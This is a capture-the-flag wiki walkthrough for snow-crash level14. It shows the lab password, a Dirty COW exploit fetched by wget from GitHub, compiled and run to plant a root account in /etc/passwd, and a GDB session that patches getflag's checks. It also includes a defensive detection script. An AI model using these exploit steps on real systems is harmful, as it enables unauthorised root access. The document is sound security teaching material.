Level14 Dirty COW - 42lan/snow-crash GitHub Wiki
Login as level14
┌──$ [~/42/2021/snow-crash]
└─> ssh 192.168.1.64 -p 4242 -l level14
level14@192.168.1.64's password: 2A31L79asukciNyi8uppkEuSx
There is no file or binary to exploit in the home directory, so look elsewhere for something exploitable: start with the kernel.
level14@SnowCrash:~$ uname -a
Linux SnowCrash 3.2.0-89-generic-pae #127-Ubuntu SMP Tue Jul 28 09:52:21 UTC 2015 i686 i686 i386 GNU/Linux
Linux kernels < 4.8.3 (created before 2018) are vulnerable to Dirty COW.
Dirty COW allows privilege escalation by exploiting a race condition in the kernel's copy-on-write mechanism: a private mapping of a read-only file can be made to write through to the underlying page cache, so an unprivileged user can modify a root-owned file such as /etc/passwd.
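For a defender, the two things worth checking on a box like this are whether the kernel predates the fix and whether /etc/passwd already carries the trace the proof of concept leaves behind (a second uid-0 account with its password hash written directly into /etc/passwd instead of /etc/shadow). The following is an added example, not code from the snow-crash project or from the dirty.c author; the sample `uname -r` strings and the passwd snapshot are constructed here, and `audit_host` is a hypothetical helper name.

```python
import re

# Constructed sample inputs (not taken from a real host): a few `uname -r`
# strings and a passwd snapshot that contains a Dirty-COW-style extra account.
SAMPLE_UNAMES = ["3.2.0-89-generic-pae", "4.4.0-45-generic", "4.8.3", "4.9.0-3-amd64"]
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
firefart:figsoZwws4Zu6:0:0:pwned:/root:/bin/bash
level14:x:2014:2014::/home/user/level14:/bin/bash
"""

# Fields whose password entry is a placeholder, i.e. the hash lives in /etc/shadow.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!", ""}


def parse_kernel_version(uname_r):
    """Return (major, minor, patch) from a `uname -r` string such as '3.2.0-89-generic-pae'."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        raise ValueError("unrecognised kernel version: %r" % uname_r)
    return tuple(int(x) if x is not None else 0 for x in m.groups())


def kernel_vulnerable_to_dirtycow(uname_r):
    """Version-only check: upstream fixed Dirty COW in 4.8.3.

    Caveat: distribution kernels backport fixes without bumping the version,
    so True here means 'verify the distro patch level', not 'confirmed vulnerable'.
    """
    return parse_kernel_version(uname_r) < (4, 8, 3)


def unexpected_uid0_accounts(passwd_text, allowed=("root",)):
    """Names of uid-0 accounts other than the expected ones (e.g. 'firefart')."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[2] == "0" and fields[0] not in allowed:
            hits.append(fields[0])
    return hits


def inline_hash_accounts(passwd_text):
    """Accounts whose password field holds a real hash instead of a shadow placeholder.

    The proof of concept writes /etc/passwd, not /etc/shadow, so the crypt(3)
    hash ends up world-readable in the passwd line itself.
    """
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] not in SHADOW_PLACEHOLDERS:
            hits.append(fields[0])
    return hits


def audit_host(uname_r, passwd_text):
    """Hypothetical helper: bundle the three findings into one report dict."""
    return {
        "kernel_predates_fix": kernel_vulnerable_to_dirtycow(uname_r),
        "extra_uid0_accounts": unexpected_uid0_accounts(passwd_text),
        "inline_hash_accounts": inline_hash_accounts(passwd_text),
    }


if __name__ == "__main__":
    for u in SAMPLE_UNAMES:
        print(u, "->", "check patch level" if kernel_vulnerable_to_dirtycow(u) else "fixed upstream")
    print(audit_host(SAMPLE_UNAMES[0], SAMPLE_PASSWD))
```

On a live host you would feed it `os.uname().release` and the contents of `/etc/passwd`; a leftover `/tmp/passwd.bak` (the backup the proof of concept writes) is a third, file-based indicator that the snippet deliberately leaves out so it stays offline.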
level14@SnowCrash:~$ cd /tmp/
level14@SnowCrash:/tmp$ wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
level14@SnowCrash:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
level14@SnowCrash:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: <Enter>
Complete line:
firefart:figsoZwws4Zu6:0:0:pwned:/root:/bin/bash
mmap: b7fda000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password ''.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password ''.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Login as root
level14@SnowCrash:/tmp$ su firefart
Password: <Enter>
Login as flag14 and get the flag.
firefart@SnowCrash:/tmp# su flag14
Congratulation. Type getflag to get the key and send it to me the owner of this livecd :)
flag14@SnowCrash:~$ getflag
Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ
Another solution, using GDB, by vsaltel
level14@SnowCrash:~$ gdb /bin/getflag
GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /bin/getflag...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x804894a
(gdb) run
Starting program: /bin/getflag
Breakpoint 1, 0x0804894a in main ()
(gdb) break *0x0804898e
Breakpoint 2 at 0x804898e
(gdb) continue
Continuing.
Breakpoint 2, 0x0804898e in main ()
(gdb) set $eax=0
(gdb) until
0x08048990 in main ()
(gdb) until
0x080489a8 in main ()
(gdb) break *0x080489b4
Breakpoint 3 at 0x80489b4
(gdb) continue
Continuing.
Breakpoint 3, 0x080489b4 in main ()
(gdb) until
0x080489b6 in main ()
(gdb) until
0x080489ea in main ()
(gdb) break *0x080489fe
Breakpoint 4 at 0x80489fe
(gdb) continue
Continuing.
Breakpoint 4, 0x080489fe in main ()
(gdb) until
0x08048a00 in main ()
(gdb) until
0x08048a34 in main ()
(gdb) break *0x08048a4c
Breakpoint 5 at 0x8048a4c
(gdb) continue
Continuing.
Breakpoint 5, 0x08048a4c in main ()
(gdb) until
0x08048a51 in main ()
(gdb) until
0x08048e88 in main ()
(gdb) break *0x08048ea5
Breakpoint 6 at 0x8048ea5
(gdb) continue
Continuing.
Breakpoint 6, 0x08048ea5 in main ()
(gdb) break *0x8048a89
Breakpoint 7 at 0x8048a89
(gdb) continue
Continuing.
Breakpoint 7, 0x08048a89 in main ()
(gdb) break *0x08048a9d
Breakpoint 8 at 0x8048a9d
(gdb) continue
Continuing.
Breakpoint 8, 0x08048a9d in main ()
(gdb) break *0x08048aae
Breakpoint 9 at 0x8048aae
(gdb) continue
Continuing.
Breakpoint 9, 0x08048aae in main ()
(gdb) print 0x10 + $esp # Get the address at which to set the value
$1 = (void *) 0xbffff630
(gdb) set *0xbffff630=0xff # Set the value at 0x10 + $esp
(gdb) break *0x08048acd
Breakpoint 10 at 0x8048acd
(gdb) continue
Continuing.
Breakpoint 10, 0x08048acd in main ()
(gdb) set $eax=1
(gdb) break *0x08048b0a
Breakpoint 11 at 0x8048b0a
(gdb) continue
Continuing.
Breakpoint 11, 0x08048b0a in main ()
(gdb) set $eax=3014
(gdb) continue
Continuing.
Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ
[Inferior 1 (process 3417) exited normally]